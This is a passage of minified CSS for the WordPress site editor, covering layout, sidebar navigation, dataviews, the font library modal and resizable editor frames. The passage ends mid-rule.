.edit-site-patterns__sub-title{margin-bottom:8px}.edit-site-patterns__section-header .screen-reader-shortcut:focus{top:0}.edit-site-page-patterns-dataviews .dataviews-view-grid__badge-fields .dataviews-view-grid__field-value:has(.edit-site-patterns__field-sync-status-fully){background:rgba(var(--wp-block-synced-color--rgb),.04);color:var(--wp-block-synced-color)}.dataviews-action-modal__duplicate-pattern [role=dialog]>[role=document]{width:350px}.dataviews-action-modal__duplicate-pattern .patterns-menu-items__convert-modal-categories{position:relative}.dataviews-action-modal__duplicate-pattern .components-form-token-field__suggestions-list:not(:empty){background-color:#fff;border:1px solid var(--wp-admin-theme-color);border-bottom-left-radius:2px;border-bottom-right-radius:2px;box-shadow:0 0 .5px .5px var(--wp-admin-theme-color);box-sizing:border-box;left:-1px;max-height:96px;min-width:auto;position:absolute;width:calc(100% + 2px);z-index:1}@media (min-width:600px){.dataviews-action-modal__duplicate-template-part .components-modal__frame{max-width:500px}}@container (max-width: 430px){.edit-site-page-patterns-dataviews .edit-site-patterns__section-header{padding-left:24px;padding-right:24px}}.page-templates-preview-field{align-items:center;border-radius:4px;display:flex;flex-direction:column;height:100%;justify-content:center;width:100%}.dataviews-view-list .page-templates-preview-field .block-editor-block-preview__container{height:120px}.dataviews-view-grid .page-templates-preview-field .block-editor-block-preview__container{height:100%}.dataviews-view-table .page-templates-preview-field{max-height:160px;position:relative;text-wrap:balance;text-wrap:pretty;width:120px}.edit-site-page-templates .dataviews-pagination{z-index:2}.page-templates-author-field__avatar{align-items:center;display:flex;flex-shrink:0;height:24px;justify-content:left;overflow:hidden;width:24px}.page-templates-author-field__avatar img{border-radius:100%;height:16px;object-fit:cover;opacity:0;width:16px}@media not (prefers-reduced-motion){.page-templates-author-field__avatar img{transition:opacity .1s linear}}.page-templates-author-field__avatar.is-loaded img{opacity:1}.page-templates-author-field__icon{display:flex;flex-shrink:0;height:24px;width:24px}.page-templates-author-field__icon svg{margin-left:-4px;fill:currentColor}.page-templates-author-field__name{overflow:hidden;text-overflow:ellipsis}.edit-site-list__rename-modal{z-index:1000001}@media (min-width:782px){.edit-site-list__rename-modal .components-base-control{width:320px}}.edit-site-editor__editor-interface{opacity:1}@media not (prefers-reduced-motion){.edit-site-editor__editor-interface{transition:opacity .1s ease-out}}.edit-site-editor__editor-interface.is-loading{opacity:0}.edit-site-editor__toggle-save-panel{background-color:#fff;border:1px dotted #ddd;box-sizing:border-box;display:flex;justify-content:center;padding:24px;width:280px}.edit-site-editor__view-mode-toggle{view-transition-name:toggle;height:64px;left:0;top:0;width:64px;z-index:100}.edit-site-editor__view-mode-toggle .components-button{align-items:center;border-radius:0;color:#fff;display:flex;height:100%;justify-content:center;overflow:hidden;padding:0;width:100%}.edit-site-editor__view-mode-toggle .components-button:active,.edit-site-editor__view-mode-toggle .components-button:hover{color:#fff}.edit-site-editor__view-mode-toggle .components-button:focus{box-shadow:none}.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon img,.edit-site-editor__view-mode-toggle .edit-site-editor__view-mode-toggle-icon svg{background:#1e1e1e;display:block}.edit-site-editor__back-icon{align-items:center;background-color:#ccc;display:flex;height:64px;justify-content:center;left:0;pointer-events:none;position:absolute;top:0;width:64px}.edit-site-editor__back-icon svg{fill:currentColor}.edit-site-editor__back-icon.has-site-icon{backdrop-filter:saturate(180%) blur(15px);background-color:#fff9}.edit-site-welcome-guide{width:312px}.edit-site-welcome-guide.guide-editor .edit-site-welcome-guide__image,.edit-site-welcome-guide.guide-styles .edit-site-welcome-guide__image{background:#00a0d2}.edit-site-welcome-guide.guide-page .edit-site-welcome-guide__video{border-right:16px solid #3858e9;border-top:16px solid #3858e9}.edit-site-welcome-guide.guide-template .edit-site-welcome-guide__video{border-left:16px solid #3858e9;border-top:16px solid #3858e9}.edit-site-welcome-guide__image{margin:0 0 16px}.edit-site-welcome-guide__image>img{display:block;max-width:100%;object-fit:cover}.edit-site-welcome-guide__heading{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:24px;line-height:1.4;margin:16px 0;padding:0 32px}.edit-site-welcome-guide__text{font-size:13px;line-height:1.4;margin:0 0 16px;padding:0 32px}.edit-site-welcome-guide__text img{vertical-align:bottom}.edit-site-welcome-guide__inserter-icon{margin:0 4px;vertical-align:text-top}.edit-site-layout{color:#ccc;display:flex;flex-direction:column;height:100%}.edit-site-layout,.edit-site-layout:not(.is-full-canvas) .editor-visual-editor{background:#1e1e1e}.edit-site-layout__content{display:flex;flex-grow:1;height:100%}.edit-site-layout__sidebar-region{flex-shrink:0;width:100vw;z-index:1}@media (min-width:782px){.edit-site-layout__sidebar-region{width:300px}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region{height:100vh;left:0;position:fixed!important;top:0}.edit-site-layout__sidebar-region .edit-site-layout__sidebar{display:flex;flex-direction:column;height:100%}.edit-site-layout__sidebar-region .resizable-editor__drag-handle{right:0}.edit-site-layout__main{display:flex;flex-direction:column;flex-grow:1;overflow:hidden}.edit-site-layout__mobile{display:flex;flex-direction:column;position:relative;width:100%;z-index:2}.edit-site-layout__mobile .edit-site-sidebar__screen-wrapper{padding:0}.edit-site-layout__mobile .edit-site-sidebar-navigation-screen__main{padding:0 12px}.edit-site-layout__canvas-container{flex-grow:1;overflow:visible;position:relative;z-index:2}.edit-site-layout__canvas-container.is-resizing:after{bottom:0;content:"";left:0;position:absolute;right:0;top:0;z-index:100}.edit-site-layout__canvas{align-items:center;bottom:0;display:flex;justify-content:center;left:0;position:absolute;top:0;width:100%}.edit-site-layout__canvas.is-right-aligned{justify-content:flex-end}.edit-site-layout__canvas .edit-site-resizable-frame__inner{color:#1e1e1e}@media (min-width:782px){.edit-site-layout__canvas{bottom:16px;top:16px;width:calc(100% - 16px)}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;overflow:hidden}}@media (min-width:782px) and (not (prefers-reduced-motion)){.edit-site-layout__canvas .edit-site-resizable-frame__inner-content{transition:border-radius,box-shadow .4s}}@media (min-width:782px){.edit-site-layout:not(.is-full-canvas) .edit-site-layout__canvas .edit-site-resizable-frame__inner-content{border-radius:8px}.edit-site-layout__canvas .edit-site-resizable-frame__inner-content:hover{box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005}}.edit-site-layout.is-full-canvas .edit-site-layout__canvas{bottom:0;top:0;width:100%}.edit-site-layout__canvas .interface-interface-skeleton,.edit-site-layout__mobile .interface-interface-skeleton,.edit-site-template-pages-preview .interface-interface-skeleton{min-height:100%!important;position:relative!important}.edit-site-template-pages-preview{height:100%}html.canvas-mode-edit-transition::view-transition-group(toggle){animation-delay:255ms}@media (prefers-reduced-motion){::view-transition-group(*),::view-transition-new(*),::view-transition-old(*){animation:none!important}}.edit-site-layout.is-full-canvas .edit-site-layout__sidebar-region .edit-site-layout__view-mode-toggle{display:none}.edit-site-layout__view-mode-toggle.components-button{view-transition-name:toggle;align-items:center;background:#1e1e1e;border-radius:0;color:#fff;display:flex;height:64px;justify-content:center;overflow:hidden;padding:0;position:relative;width:64px}.edit-site-layout__view-mode-toggle.components-button:active,.edit-site-layout__view-mode-toggle.components-button:hover{color:#fff}.edit-site-layout__view-mode-toggle.components-button:focus,.edit-site-layout__view-mode-toggle.components-button:focus-visible{box-shadow:0 0 0 3px #1e1e1e,0 0 0 6px var(--wp-admin-theme-color);outline:4px solid #0000;outline-offset:4px}.edit-site-layout__view-mode-toggle.components-button:before{border-radius:4px;bottom:9px;box-shadow:none;content:"";display:block;left:17px;position:absolute;right:9px;top:9px}@media not (prefers-reduced-motion){.edit-site-layout__view-mode-toggle.components-button:before{transition:box-shadow .1s ease}}.edit-site-layout__view-mode-toggle.components-button .edit-site-layout__view-mode-toggle-icon{align-items:center;display:flex;height:64px;justify-content:center;width:64px}.edit-site-layout__actions{background:#fff;bottom:auto;color:#1e1e1e;left:auto;position:fixed!important;right:0;top:-9999em;width:280px;z-index:100000}.edit-site-layout__actions:focus,.edit-site-layout__actions:focus-within{bottom:0;top:auto}.edit-site-layout__actions.is-entity-save-view-open:focus,.edit-site-layout__actions.is-entity-save-view-open:focus-within{top:0}@media (min-width:782px){.edit-site-layout__actions{border-left:1px solid #ddd}}.edit-site-layout__area{box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;flex-grow:1;margin:0;overflow:hidden}@media (min-width:782px){.edit-site-layout__area{border-radius:8px;margin:16px 16px 16px 0}}.edit-site .components-editor-notices__snackbar{bottom:16px;padding-left:16px;padding-right:16px;position:fixed;right:0}.edit-site-save-hub{border-top:1px solid #2f2f2f;color:#949494;flex-shrink:0;margin:0;padding:16px}.edit-site-save-hub__button{color:inherit;justify-content:center;width:100%}.edit-site-save-hub__button[aria-disabled=true]{opacity:1}.edit-site-save-hub__button[aria-disabled=true]:hover{color:inherit}.edit-site-save-hub__button:not(.is-primary).is-busy,.edit-site-save-hub__button:not(.is-primary).is-busy[aria-disabled=true]:hover{color:#1e1e1e}@media (min-width:600px){.edit-site-save-panel__modal{width:600px}}.edit-site-sidebar__content{contain:content;flex-grow:1;overflow-x:hidden;overflow-y:auto}@keyframes local--slide-from-right{0%{opacity:0;transform:translateX(50px)}to{opacity:1;transform:none}}@keyframes local--slide-from-left{0%{opacity:0;transform:translateX(-50px)}to{opacity:1;transform:none}}.edit-site-sidebar__screen-wrapper{overflow-x:auto}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar{height:12px;width:12px}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-track{background-color:initial}.edit-site-sidebar__screen-wrapper::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.edit-site-sidebar__screen-wrapper:focus-within::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:focus::-webkit-scrollbar-thumb,.edit-site-sidebar__screen-wrapper:hover::-webkit-scrollbar-thumb{background-color:#757575}.edit-site-sidebar__screen-wrapper{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.edit-site-sidebar__screen-wrapper:focus,.edit-site-sidebar__screen-wrapper:focus-within,.edit-site-sidebar__screen-wrapper:hover{scrollbar-color:#757575 #0000}.edit-site-sidebar__screen-wrapper{will-change:transform}@media (hover:none){.edit-site-sidebar__screen-wrapper{scrollbar-color:#757575 #0000}}.edit-site-sidebar__screen-wrapper{animation-duration:.14s;animation-timing-function:ease-in-out;display:flex;flex-direction:column;height:100%;max-height:100%;padding:0 12px;scrollbar-gutter:stable;will-change:transform,opacity}@media (prefers-reduced-motion:reduce){.edit-site-sidebar__screen-wrapper{animation-duration:0s}}.edit-site-sidebar__screen-wrapper.slide-from-left{animation-name:local--slide-from-left}.edit-site-sidebar__screen-wrapper.slide-from-right{animation-name:local--slide-from-right}.edit-site-sidebar-button{color:#e0e0e0;flex-shrink:0}.edit-site-sidebar-button:focus:not(:disabled){box-shadow:none;outline:none}.edit-site-sidebar-button:focus-visible:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:3px solid #0000}.edit-site-sidebar-button:focus,.edit-site-sidebar-button:focus-visible,.edit-site-sidebar-button:hover:not(:disabled,[aria-disabled=true]),.edit-site-sidebar-button:not(:disabled,[aria-disabled=true]):active,.edit-site-sidebar-button[aria-expanded=true]{color:#f0f0f0}.edit-site-sidebar-navigation-item.components-item{border:none;color:#949494;min-height:40px;padding:8px 6px 8px 16px}.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-item.components-item[aria-current=true]{color:#e0e0e0}.edit-site-sidebar-navigation-item.components-item:focus .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item:hover .edit-site-sidebar-navigation-item__drilldown-indicator,.edit-site-sidebar-navigation-item.components-item[aria-current=true] .edit-site-sidebar-navigation-item__drilldown-indicator{fill:#e0e0e0}.edit-site-sidebar-navigation-item.components-item[aria-current=true]{background:#2f2f2f;color:#fff;font-weight:500}.edit-site-sidebar-navigation-item.components-item:focus-visible{transform:translateZ(0)}.edit-site-sidebar-navigation-item.components-item .edit-site-sidebar-navigation-item__drilldown-indicator{fill:#949494}.edit-site-sidebar-navigation-item.components-item.with-suffix{padding-right:16px}.edit-site-sidebar-navigation-screen__content .block-editor-list-view-block-select-button{cursor:grab;padding:8px 8px 8px 0}.edit-site-sidebar-navigation-screen{display:flex;flex-direction:column;overflow-x:unset!important;position:relative}.edit-site-sidebar-navigation-screen__main{flex-grow:1;margin-bottom:16px}.edit-site-sidebar-navigation-screen__main.has-footer{margin-bottom:0}.edit-site-sidebar-navigation-screen__content{padding:0 16px}.edit-site-sidebar-navigation-screen__content .components-text{color:#ccc}.edit-site-sidebar-navigation-screen__content .components-heading{margin-bottom:8px}.edit-site-sidebar-navigation-screen__title-icon{background:#1e1e1e;margin-bottom:8px;padding-bottom:8px;padding-top:48px;position:sticky;top:0;z-index:1}.edit-site-sidebar-navigation-screen__title{flex-grow:1;overflow-wrap:break-word}.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title,.edit-site-sidebar-navigation-screen__title.edit-site-sidebar-navigation-screen__title .edit-site-sidebar-navigation-screen__title{line-height:32px}.edit-site-sidebar-navigation-screen__actions{display:flex;flex-shrink:0}@media (min-width:782px){.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variation-container{max-width:292px}}.edit-site-global-styles-variation-title{color:#ddd;font-size:11px;font-weight:500;text-transform:uppercase}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{outline-color:#ffffff0d}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{outline-color:#ffffff26}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview{outline-color:#fff}.edit-site-sidebar-navigation-screen__content .edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:var(--wp-admin-theme-color)}.edit-site-sidebar-navigation-screen__footer{background-color:#1e1e1e;border-top:1px solid #2f2f2f;bottom:0;gap:0;margin:16px 0 0;padding:8px 16px;position:sticky}.edit-site-sidebar-navigation-screen__footer .edit-site-sidebar-navigation-screen-details-footer{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen__input-control{width:100%}.edit-site-sidebar-navigation-screen__input-control .components-input-control__container{background:#2f2f2f}.edit-site-sidebar-navigation-screen__input-control .components-input-control__container .components-button{color:#e0e0e0!important}.edit-site-sidebar-navigation-screen__input-control .components-input-control__input{background:#2f2f2f!important;color:#e0e0e0!important}.edit-site-sidebar-navigation-screen__input-control .components-input-control__backdrop{border:4px!important}.edit-site-sidebar-navigation-screen__input-control .components-base-control__help{color:#949494}.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:focus,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item:hover,.edit-site-sidebar-navigation-screen-details-footer div.edit-site-sidebar-navigation-item.components-item[aria-current]{background:none}.sidebar-navigation__more-menu .components-button{color:#e0e0e0}.sidebar-navigation__more-menu .components-button:focus,.sidebar-navigation__more-menu .components-button:hover,.sidebar-navigation__more-menu .components-button[aria-current]{color:#f0f0f0}.edit-site-sidebar-navigation-screen-patterns__group{margin-bottom:24px;margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen-patterns__group:last-of-type{border-bottom:0;margin-bottom:0;padding-bottom:0}.edit-site-sidebar-navigation-screen-patterns__group-header{margin-top:16px}.edit-site-sidebar-navigation-screen-patterns__group-header p{color:#949494}.edit-site-sidebar-navigation-screen-patterns__group-header h2{font-size:11px;font-weight:500;text-transform:uppercase}.edit-site-sidebar-navigation-screen-patterns__divider{border-top:1px solid #2f2f2f;margin:16px 0}.edit-site-sidebar-navigation-screen__description{margin:0 0 32px}.edit-site-sidebar-navigation-screen-navigation-menus{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{white-space:normal}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__title{margin-top:3px}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu-cell{padding-right:0}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button{color:#949494}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button:hover,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block-select-button[aria-current]{color:#fff}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu{color:#949494}.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:focus,.edit-site-sidebar-navigation-screen-navigation-menus__content .block-editor-list-view-block__menu:hover{color:#fff}.edit-site-sidebar-navigation-screen-navigation-menus__loading.components-spinner{display:block;margin-left:auto;margin-right:auto}.edit-site-sidebar-navigation-screen-navigation-menus__helper-block-editor{display:none}.edit-site-sidebar-dataviews,.edit-site-sidebar-navigation-screen-main,.edit-site-sidebar-navigation-screen-templates-browse{margin-left:-16px;margin-right:-16px}.edit-site-sidebar-dataviews-dataview-item{border-radius:2px}.edit-site-sidebar-dataviews-dataview-item:focus,.edit-site-sidebar-dataviews-dataview-item:hover,.edit-site-sidebar-dataviews-dataview-item[aria-current]{color:#e0e0e0}.edit-site-sidebar-dataviews-dataview-item.is-selected{background:#2f2f2f;color:#fff;font-weight:500}.edit-site-site-hub{align-items:center;display:flex;gap:8px;height:64px;justify-content:space-between;margin-right:12px}.edit-site-site-hub__actions{flex-shrink:0}.edit-site-site-hub__view-mode-toggle-container{flex-shrink:0;height:64px;width:64px}.edit-site-site-hub__view-mode-toggle-container.has-transparent-background .edit-site-layout__view-mode-toggle-icon{background:#0000}.edit-site-site-hub__title .components-button{color:#e0e0e0;display:block;flex-grow:1;font-size:15px;font-weight:500;margin-left:-4px;overflow:hidden;padding-right:16px;position:relative;text-decoration:none;text-overflow:ellipsis;white-space:nowrap}.edit-site-site-hub__title .components-button:active,.edit-site-site-hub__title .components-button:focus,.edit-site-site-hub__title .components-button:hover{color:#e0e0e0}.edit-site-site-hub__title .components-button:focus{box-shadow:none;outline:none}.edit-site-site-hub__title .components-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #1e1e1e,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.edit-site-site-hub__title .components-button:after{content:"↗";font-weight:400;opacity:0;position:absolute;right:0}@media not (prefers-reduced-motion){.edit-site-site-hub__title .components-button:after{transition:opacity .1s linear}}.edit-site-site-hub__title .components-button:active:after,.edit-site-site-hub__title .components-button:focus:after,.edit-site-site-hub__title .components-button:hover:after{opacity:1}.edit-site-site-hub_toggle-command-center{color:#e0e0e0}.edit-site-site-hub_toggle-command-center:active svg,.edit-site-site-hub_toggle-command-center:hover svg{fill:#f0f0f0}.edit-site-site-icon__icon{fill:currentColor;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__icon{padding:12px}.edit-site-site-icon__image{aspect-ratio:1/1;background:#333;height:100%;object-fit:cover;width:100%}.edit-site-layout.is-full-canvas .edit-site-site-icon__image{border-radius:0}.edit-site-editor__view-mode-toggle button:focus{position:relative}.edit-site-editor__view-mode-toggle button:focus:before{bottom:0;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 calc(1px + var(--wp-admin-border-width-focus)) #fff;content:"";display:block;left:0;position:absolute;right:0;top:0;z-index:1}.edit-site-style-book{height:100%}.edit-site-style-book.is-button{border-radius:8px}.edit-site-style-book{align-items:stretch;display:flex;flex-direction:column}.edit-site-style-book__iframe{display:block;height:100%;width:100%}.edit-site-style-book__iframe.is-button{border-radius:8px}.edit-site-style-book__iframe.is-focused{outline:calc(var(--wp-admin-border-width-focus)*2) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-2)}.edit-site-style-book__tablist-container{background:#fff;display:flex;flex:none;padding-right:56px;width:100%}.edit-site-style-book__tabpanel{flex:1 0 auto;overflow:auto}.edit-site-editor-canvas-container{background-color:var(--wp-editor-canvas-background);height:100%}.edit-site-editor-canvas-container iframe{display:block;height:100%;width:100%}.edit-site-layout.is-full-canvas .edit-site-editor-canvas-container{padding:24px 24px 0}.edit-site-editor-canvas-container__section{background:#fff;border-radius:8px;bottom:0;left:0;overflow:hidden;position:absolute;right:0;top:0}@media not (prefers-reduced-motion){.edit-site-editor-canvas-container__section{transition:all .3s}}.edit-site-editor-canvas-container__close-button{background:#fff;position:absolute;right:8px;top:8px;z-index:2}.edit-site-post-edit{padding:24px}.dataforms-layouts-panel__field-dropdown .fields-controls__password{border-top:1px solid #e0e0e0;padding-top:16px}.edit-site-post-list__featured-image{height:100%;object-fit:cover;width:100%}.edit-site-post-list__featured-image-wrapper{border-radius:4px;height:100%;width:100%}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)){background-color:#f0f0f0;border-radius:4px;display:block;flex-grow:0!important;height:32px;overflow:hidden;position:relative;width:32px}.edit-site-post-list__featured-image-wrapper.is-layout-table .edit-site-post-list__featured-image-button:after,.edit-site-post-list__featured-image-wrapper.is-layout-table:not(:has(.edit-site-post-list__featured-image-button)):after{border-radius:4px;box-shadow:inset 0 0 0 1px #0000001a;content:"";height:100%;left:0;position:absolute;top:0;width:100%}.edit-site-post-list__featured-image-button{background-color:unset;border:none;border-radius:4px;box-shadow:none;box-sizing:border-box;cursor:pointer;height:100%;overflow:hidden;padding:0;width:100%}.edit-site-post-list__featured-image-button:focus-visible{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.dataviews-view-grid__card.is-selected .edit-site-post-list__featured-image-button:after{background:rgba(var(--wp-admin-theme-color--rgb),.04);box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.edit-site-post-list__status-icon{height:24px;width:24px}.edit-site-post-list__status-icon svg{fill:currentColor;margin-left:-4px}.edit-site-resizable-frame__inner{position:relative}body:has(.edit-site-resizable-frame__inner.is-resizing){cursor:col-resize;user-select:none;-webkit-user-select:none}.edit-site-resizable-frame__inner.is-resizing:before{content:"";inset:0;position:absolute;z-index:1}.edit-site-resizable-frame__inner-content{inset:0;position:absolute;z-index:0}.edit-site-resizable-frame__handle{align-items:center;background-color:#75757566;border:0;border-radius:4px;cursor:col-resize;display:flex;height:64px;justify-content:flex-end;padding:0;position:absolute;top:calc(50% - 32px);width:4px;z-index:100}.edit-site-resizable-frame__handle:before{content:"";height:100%;left:100%;position:absolute;width:32px}.edit-site-resizable-frame__handle:after{content:"";height:100%;position:absolute;right:100%;width:32px}.edit-site-resizable-frame__handle:focus-visible{outline:2px solid #0000}.edit-site-resizable-frame__handle.is-resizing,.edit-site-resizable-frame__handle:focus,.edit-site-resizable-frame__handle:hover{background-color:var(--wp-admin-theme-color)}.edit-site-push-changes-to-global-styles-control .components-button{justify-content:center;width:100%}@media (min-width:782px){.font-library-modal.font-library-modal{width:65vw}}.font-library-modal .components-modal__header{border-bottom:none}.font-library-modal .components-modal__content{margin-bottom:70px;padding-top:0}.font-library-modal .font-library-modal__subtitle{font-size:11px;font-weight:500;text-transform:uppercase}.font-library-modal .components-navigator-screen{padding:3px}.font-library-modal__tabpanel-layout{margin-top:32px}.font-library-modal__tabpanel-layout .font-library-modal__loading{align-items:center;display:flex;height:100%;justify-content:center;left:0;padding-top:124px;position:absolute;top:0;width:100%}.font-library-modal__footer{background-color:#fff;border-top:1px solid #ddd;bottom:32px;height:70px;margin:0 -32px -32px;padding:16px 32px;position:absolute;width:100%}.font-library-modal__page-selection{font-size:11px;font-weight:500;text-transform:uppercase}@media (min-width:600px){.font-library-modal__page-selection .components-select-control__input{font-size:11px!important;font-weight:500}}.font-library-modal__fonts-title{font-size:11px;font-weight:600;margin-bottom:0;margin-top:0;text-transform:uppercase}.font-library-modal__fonts-list{margin-bottom:0;margin-top:0}.font-library-modal__fonts-list-item{margin-bottom:0}.font-library-modal__font-card{border:1px solid #e0e0e0;height:auto!important;margin-top:-1px;padding:16px;width:100%}.font-library-modal__font-card:hover{background-color:#f0f0f0}.font-library-modal__font-card:focus{position:relative}.font-library-modal__font-card .font-library-modal__font-card__name{font-weight:700}.font-library-modal__font-card .font-library-modal__font-card__count{color:#757575}.font-library-modal__font-card .font-library-modal__font-variant_demo-image{display:block;height:24px;width:auto}.font-library-modal__font-card .font-library-modal__font-variant_demo-text{flex-shrink:0;white-space:nowrap}@media not (prefers-reduced-motion){.font-library-modal__font-card .font-library-modal__font-variant_demo-text{transition:opacity .3s ease-in-out}}.font-library-modal__font-variant{border-bottom:1px solid #e0e0e0;padding-bottom:16px}.font-library-modal__tablist-container{background:#fff;border-bottom:1px solid #ddd;margin:0 -32px;padding:0 16px;position:sticky;top:0;z-index:1}.font-library-modal__tablist-container [role=tablist]{margin-bottom:-1px}.font-library-modal__upload-area{align-items:center;display:flex;height:256px!important;justify-content:center;width:100%}button.font-library-modal__upload-area{background-color:#f0f0f0}.font-library-modal__local-fonts{margin:0 auto;width:80%}.font-library-modal__local-fonts .font-library-modal__upload-area__text{color:#757575}.font-library__google-fonts-confirm{align-items:center;display:flex;justify-content:center;margin-top:64px}.font-library__google-fonts-confirm p{line-height:1.4}.font-library__google-fonts-confirm h2{font-size:1.2rem;font-weight:400}.font-library__google-fonts-confirm .components-card{padding:16px;width:400px}.font-library__google-fonts-confirm .components-button{justify-content:center;width:100%}.font-library-modal__select-all{padding:16px 16px 16px 17px}.font-library-modal__select-all .components-checkbox-control__label{padding-left:16px}.edit-site-pagination .components-button.is-tertiary{height:32px;justify-content:center;width:32px}.edit-site-global-styles-variations_item{box-sizing:border-box;cursor:pointer}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{border-radius:2px;outline:1px solid #0000001a;outline-offset:-1px;overflow:hidden;position:relative}@media not (prefers-reduced-motion){.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview{transition:outline .1s linear}}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill{height:32px}.edit-site-global-styles-variations_item .edit-site-global-styles-variations_item-preview.is-pill .block-editor-iframe__scale-container{overflow:hidden}.edit-site-global-styles-variations_item:not(.is-active):hover .edit-site-global-styles-variations_item-preview{outline-color:#0000004d}.edit-site-global-styles-variations_item.is-active .edit-site-global-styles-variations_item-preview,.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:#1e1e1e;outline-offset:1px;outline-width:var(--wp-admin-border-width-focus)}.edit-site-global-styles-variations_item:focus-visible .edit-site-global-styles-variations_item-preview{outline-color:var(--wp-admin-theme-color)}.edit-site-styles .edit-site-global-styles-screen-root{box-shadow:none}.edit-site-styles .edit-site-global-styles-screen-root>div>hr{display:none}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .components-tools-panel{border-top:none}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider{overflow-y:auto;padding-left:0;padding-right:0}.edit-site-styles .edit-site-global-styles-sidebar__navigator-provider .edit-site-global-styles-sidebar__navigator-screen{outline:none;padding:12px}.edit-site-styles .edit-site-sidebar-button{color:#1e1e1e}::view-transition-image-pair(root){isolation:auto}::view-transition-new(root),::view-transition-old(root){animation:none;display:block;mix-blend-mode:normal}body.js #wpadminbar{display:none}body.js #wpbody{padding-top:0}body.js.appearance_page_gutenberg-template-parts,body.js.site-editor-php{background:#fff}body.js.appearance_page_gutenberg-template-parts #wpcontent,body.js.site-editor-php #wpcontent{padding-left:0}body.js.appearance_page_gutenberg-template-parts #wpbody-content,body.js.site-editor-php #wpbody-content{padding-bottom:0}body.js.appearance_page_gutenberg-template-parts #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.appearance_page_gutenberg-template-parts #wpfooter,body.js.site-editor-php #wpbody-content>div:not(.edit-site):not(#screen-meta),body.js.site-editor-php #wpfooter{display:none}body.js.appearance_page_gutenberg-template-parts .a11y-speak-region,body.js.site-editor-php .a11y-speak-region{left:-1px;top:-1px}body.js.appearance_page_gutenberg-template-parts ul#adminmenu a.wp-has-current-submenu:after,body.js.appearance_page_gutenberg-template-parts ul#adminmenu>li.current>a.current:after,body.js.site-editor-php ul#adminmenu a.wp-has-current-submenu:after,body.js.site-editor-php ul#adminmenu>li.current>a.current:after{border-right-color:#fff}body.js.appearance_page_gutenberg-template-parts .media-frame select.attachment-filters:last-of-type,body.js.site-editor-php .media-frame select.attachment-filters:last-of-type{max-width:100%;width:auto}body.js.site-editor-php{background:#1e1e1e}.edit-site{box-sizing:border-box}.edit-site *,.edit-site :after,.edit-site :before{box-sizing:inherit}.edit-site{height:100vh}@media (min-width:600px){.edit-site{bottom:0;left:0;min-height:100vh;position:fixed;right:0;top:0}}.no-js .edit-site{min-height:0;position:static}.edit-site 